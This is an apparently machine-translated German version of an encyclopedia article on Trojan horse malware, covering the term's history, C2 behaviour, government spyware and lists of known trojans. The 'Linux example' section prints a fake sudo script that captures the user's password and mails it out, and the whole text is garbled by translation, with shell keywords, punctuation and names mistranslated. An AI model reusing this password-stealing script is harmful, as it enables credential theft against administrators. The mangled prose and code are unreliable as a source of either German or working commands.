Trojanisches Pferd (Computer)
Im Computer, a Trojanisches Pferd ist jeder Malware Das führt die Nutzer seiner wahren Absicht irre. Der Begriff wird von der abgeleitet Altgriechisch Geschichte der Täuschung Trojanisches Pferd das führte zum Fall der Stadt von Troy.[1][2][3][4][5]
Trojaner verbreiten sich im Allgemeinen um irgendeine Form von soziale Entwicklung; Zum Beispiel, wo ein Benutzer in die Ausführung eines betrogen wird Email Der Anhang, der getarnt war, harmlos zu erscheinen (z. B. eine routinemäßige Form, die ausgefüllt werden muss) oder durch Klicken auf eine gefälschte Anzeige in sozialen Medien oder irgendwo anders. Obwohl ihre Nutzlast alles sein kann, wirken viele moderne Formen als HintertürKontakt mit einem Controller, der dann den nicht autorisierten Zugriff auf den betroffenen Computer haben kann.[6] Ransomware Angriffe werden oft mit einem Trojaner durchgeführt.
nicht wie Computer Virus, Würmer, und Rogue -SicherheitssoftwareTrojaner versuchen im Allgemeinen nicht, sich in andere Dateien zu injizieren oder sich auf andere Weise zu verbreiten.[7]
Verwendung des Begriffs
Es ist nicht klar, wo oder wann das Konzept und dieser Begriff dafür zuerst verwendet wurde, aber bis 1971 der erste Unix Handbuch nahm an, dass seine Leser beide wussten:[8]
Außerdem kann man den Eigentümer einer Datei mit dem Set - Benutzer - ID -Bit nicht ändern, andernfalls könnte man trojanische Pferde erstellen, die in der Lage sind, die Dateien anderer zu missbrauchen.
Eine weitere frühe Referenz befindet sich in einem US -Luftwaffenbericht von 1974 über die Analyse der Verwundbarkeit in der Mehrheit Computersysteme.[9]
Es wurde von populär von durch Ken Thompson In seinem 1983er Turing Award Acceptance Vortrag "Überlegungen zum Vertrauen des Vertrauens",[10] Untertitel: Inwieweit sollte man einer Erklärung vertrauen, dass ein Programm frei von Trojanischen Pferden ist? Vielleicht ist es wichtiger, den Menschen zu vertrauen, die die Software geschrieben haben. Er erwähnte, dass er von einem Bericht über die Sicherheit von Mehrheit über die mögliche Existenz von Trojanern wusste.[11][12]
Verhalten
Nach der Installation können die Trojaner eine Reihe von böswilligen Aktionen ausführen. Viele neigen dazu, einen oder mehrere zu kontaktieren Steuerung und Kontrolle (C2) Server im Internet und erwarten Sie die Anweisung. Da einzelne Trojaner normalerweise einen bestimmten Satz von Ports für diese Kommunikation verwenden, kann es relativ einfach sein, sie zu erkennen. Darüber hinaus könnte andere Malware den Trojaner möglicherweise "übernehmen" und ihn als Proxy für böswillige Handlungen verwenden.[13]
In deutschsprachigen Ländern, Spyware von der Regierung verwendet oder hergestellt wird manchmal genannt Govware. Govware ist in der Regel eine Trojaner -Software, mit der die Kommunikation vom Zielcomputer abgefangen wird. Einige Länder wie die Schweiz und Deutschland haben einen rechtlichen Rahmen für die Verwendung einer solchen Software.[14][15] Beispiele für Govware -Trojaner sind die Schweizer Minipanzer und Megapanzer[16] und die Deutscher "Staat Trojaner" mit dem Spitznamen R2D2.[14] Die deutsche Govware arbeitet, indem sie Sicherheitslücken ausnutzen, die der breiten Öffentlichkeit unbekannt sind und auf Smartphone -Daten zugreifen, bevor sie über andere Anwendungen verschlüsselt werden.[17]
Aufgrund der Popularität von Botnets Unter den Hackern und der Verfügbarkeit von Werbediensten, die es den Autoren ermöglichen, gegen die Privatsphäre ihrer Benutzer zu verstoßen, werden die Trojaner immer häufiger. Nach einer Umfrage von durchgeführt von Bitdefender Von Januar bis Juni 2009 "steigt die Malware vom Typ Trojaner an und macht 83% der weltweit entdeckten globalen Malware aus." Trojaner haben eine Beziehung zu Würmern, da sie sich mit der Hilfe von Würmern ausbreiten und mit ihnen über das Internet reisen.[18] Bitdefender hat erklärt, dass ungefähr 15% der Computer Mitglieder eines Botnetzes sind, die normalerweise von einer Trojaner -Infektion rekrutiert werden.[19]
Linux -Beispiel
A Trojanisches Pferd ist ein Programm Dies gibt vor, eine offensichtliche Funktion auszuführen, aber bei der Ausführung beeinträchtigt sie die Sicherheit des Benutzers.[20] Ein einfaches Programm ist eine neue Version des Linux sudo Befehl. Der Befehl wird dann in ein öffentlich beschreibbares Verzeichnis kopiert wie /tmp
. Wenn sich ein Administrator in diesem Verzeichnis befindet und ausgeführt wird sudo
, dann ist die Trojanisches Pferd könnte ausgeführt werden. Hier ist eine Arbeitsversion:
:# sudo # ---- # Schalten Sie das Charakter -Echo auf den Bildschirm aus. STTY -Echo /bin /echo -n "Passwort für" whoami ":" lesen x /bin /echo "" " # Kehren Sie das Charakter -Echo wieder ein. Stty Echo Echo $ x | Mail -S "` Whoami` Passwort " auß[email protected] Schlaf 1 Echo Es tut uns leid. rm $ 0 Ausfahrt 0
Zu verhindern a Befehlszeile basierend Trojanisches Pferd, setzen Sie die .
Eintrag in Pfad =
Umgebungsvariable am Ende. Zum Beispiel: Path =/usr/local/bin:/usr/bin:.
.
Bemerkenswerte Beispiele
Privat und staatlich
- Anom - FBI
- 0ZAPFTIS / R2D2 STAATSTROJANERER - Digitask
- Darkcomet - CIA / NSA
- Finfisher - Lench IT Solutions / Gamma International
- Davinci / galileo rcs - Hackingteam
- Zauberlaterne - FBI
- Sunburst – SVR/Gemütlicher Bär (vermutlich)
- Tao -Quanten/Foxazid - NSA
- Kriegerstolz - GCHQ
Öffentlich verfügbar
- Egabtr - Ende der 1980er Jahre
- NetBus - 1998 (veröffentlicht)[21]
- Sub7 von Mobman - 1999 (veröffentlicht)
- Rückenöffnung - 1998 (veröffentlicht)
- Y3K Remote Administration Tool von E & K Tselentis - 2000 (veröffentlicht)
- Tier - 2002 (veröffentlicht)
- Bifrost Trojaner - 2004 (veröffentlicht)
- Darkcomet -2008-2012 (veröffentlicht)
- Blackhole Exploit Kit - 2012 (veröffentlicht)
- GH0ST -Ratte - 2009 (veröffentlicht)
- Megapanzer Bundestrojaner - 2009 (veröffentlicht)[22][23]
- Memz von Leurak - 2016 (veröffentlicht)
Von Sicherheitsforschern entdeckt
- Zwölf Tricks – 1990
- ClickBot.A - 2006 (entdeckt)
- Zeus - 2007 (entdeckt)
- Rückblende Trojaner - 2011 (entdeckt)
- Zero Access - 2011 (entdeckt)
- Koobface - 2008 (entdeckt)
- Vundo - 2009 (entdeckt)
- Meredrop - 2010 (entdeckt)
- CoreFlood - 2010 (entdeckt)
- Tiny Banker Trojaner - 2012 (entdeckt)
- Shedun Android Malware - 2015 (entdeckt)[24][25][26][27][28][29]
Kapitalisierung
Der Computerbegriff "Trojanisches Pferd" stammt aus dem legendären Trojanisches Pferd der alten Stadt von Troy. Aus diesem Grund wird "Trojaner" oft aktiviert. Aber während Stilführer und Wörterbücher unterscheiden sich, viele schlagen einen niedrigeren Fall "Trojaner" für den normalen Gebrauch vor.[30][31]
Siehe auch
- Computersicherheit
- Kuckucksei (Metapher)
- Cyber -Spionage
- Schweine tanzen
- Ausnutzung (Computersicherheit)
- Industriespionage
- Prinzip der geringsten Privilegien
- Datenschutz-invasive Software
- Fernverwaltung
- Fernverwaltungssoftware
- Rückwärtsverbindung
- Rogue -Sicherheitssoftware
- Betrüger
- Betrug technischer Support
- Zeitleiste von Computerviren und Würmern
- Zombie (Informatik)
Verweise
- ^ Landwehr, Carl E.; Alan R. Bull; John P. McDermott; William S. Choi (1993). Eine Taxonomie von Sicherheitsmängeln für Computerprogramme mit Beispielen (PDF). Dtic dokument. Citeseerx 10.1.1.35.997. Archiviert Aus dem Original am 8. April 2013. Abgerufen 5. April, 2012.
- ^ "Trojanische Pferddefinition". Abgerufen 5. April, 2012.
- ^ "Trojanisches Pferd". Webopedia. Abgerufen 5. April, 2012.
- ^ "Was ist trojanisches Pferd? - Definition von Whatis.com". Abgerufen 5. April, 2012.
- ^ "Trojanisches Pferd: [geprägt von MIT-Hacker-N-NSA-Spook Dan Edwards] N." Abgerufen 5. April, 2012.
- ^ "Unterschied zwischen Viren, Würmern und Trojanern". Symantec Security Center. Broadcom Inc. Archiviert Aus dem Original am 19. August 2013. Abgerufen 29. März, 2020.
- ^ "Virus-l/comp.virus Häufige Fragen (FAQ) v2.00 (Frage B3: Was ist ein Trojaner-Pferd?)". 9. Oktober 1995. Archiviert von das Original am 5. August 2020. Abgerufen 16. September, 2019.
- ^ Thompsom, K. "UNIX -Programmierhandbuch, 3. November 1971" (PDF). Abgerufen 28. März, 2020.
- ^ Karger, P. A.; Schell, R. R., "Mehrheitssicherheitsbewertung: Sicherheitsanalyse, ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II
- ^ Ken Thompson (1984). "Reflexion über das Vertrauen des Vertrauens". Kommunieren. ACM. 27 (8): 761–763. doi:10.1145/358198.358210..
- ^ Paul A. Karger; Roger R. Schell (2002), "Dreißig Jahre später: Lehren aus der Mehrfachsicherheitsbewertung" (PDF), ACSAC: 119–126
- ^ Karger et Schell schrieb, dass Thompson diese Referenz in einer späteren Version seiner Turing -Konferenz hinzugefügt hat: Ken Thompson (November 1989), "über Vertrauensvertrauen",, ",", ",", ",", ",", ",", ",", ",", ",", ",", ",", ",", ",", " UNIX -Bewertung, 7 (11): 70–74
- ^ Crapanzano, Jamie (2003). Dekonstruieren von Unterseven, das trojanische Pferd der Wahl (Bericht). Ohne Institut. Abgerufen 10. Mai, 2021.
- ^ a b Basilikum Cupa, Trojanisches Pferd auferstanden: Über die Rechtmäßigkeit der Verwendung von Regierungsspyware (Govware), Liss 2013, S. 419–428
- ^ "Häufig Gestellte Fragen (häufig gestellte Fragen)". Bundesministerium für Justiz und Polizei. Archiviert von das Original am 6. Mai 2013.
- ^ Dunn, John (27. August 2009). "Schweizer Codierer Publizisierte der Regierung Spion Trojaner". Techworld. Archiviert von das Original am 26. Januar 2014. Abgerufen 10. Januar, 2021.
- ^ "Die deutsche Bundespolizei nutzt das Trojaner -Virus, um die Telefonverschlüsselung auszuweichen". Dw. Abgerufen 14. April, 2018.
- ^ "Bitdefender Malware und Spam Survey finden E-Bedrohungen, die sich an Online-Verhaltenstrends anpassen". Bitdefender. Archiviert von das Original am 8. August 2009. Abgerufen 27. März, 2020.
- ^ Datta, Ganesh (7. August 2014). "Was sind Trojaner?". Securaid. Archiviert von das Original am 12. August 2014. Abgerufen 27. März, 2020.
- ^ Wood, Patrick H.; Kochan, Stephen G. (1985). Unix -Systemsicherheit. Hayden Bücher. p. 42. ISBN 0-8104-6267-2.
- ^ Seth, Kulakow (1998). "Ist es immer noch ein trojanisches Pferd oder ein tatsächliches gültiges Tool für Fernbedienungsverwaltung?" (Bericht). Ohne Institut. Abgerufen 10. Mai, 2021.
- ^ "Mega-Panzer". SourceForge.
- ^ "Mini-Panzer". SourceForge.
- ^ "Trojanisierte Adware -Familie missbraucht den Barrierefreiheit Service, um alle gewünschten Apps zu installieren - Lookout -Blog".
- ^ Neal, Dave (20. November 2015). "Shedun Trojan Adware trifft auf den Android Accessibility Service". Der Anfragen. Schnittgeschäftsmedien. Archiviert vom Original am 22. November 2015. Abgerufen 27. März, 2020.
{{}}
: CS1 Wartung: Ungeeignete URL (Link) - ^ "Lookout entdeckt neue trojanisierte Adware; 20.000 beliebte Apps, die im Crossfire - Lookout -Blog gefangen wurden".
- ^ "Shuanet, Shiftybug und Shedun Malware könnten Ihr Android automatisch verwurzeln". 5. November 2015.
- ^ Times, Tech (9. November 2015). "Neue Familie von Android Malware praktisch nicht zu entfernen: Sag Hallo zu Shedun, Shuanet und Shiftybug".
- ^ "Android -Adware kann sich selbst installieren, wenn Benutzer sie explizit ablehnen". 19. November 2015.
- ^ "Trojaner". Collins Advanced Dictionary. Abgerufen 29. März, 2020.
- ^ "Trojanisches Pferd". Microsoft Style Guide. Microsoft. Abgerufen 29. März, 2020.
Externe Links
- Medien im Zusammenhang mit Trojaner Pferd (Malware) bei Wikimedia Commons
- "Cert Advisory CA-1999-02 Trojanische Pferde" (PDF). Carnegie Mellon University Software Engineering Institute. Archiviert Aus dem Original am 17. Oktober 2000. Abgerufen 15. September, 2019.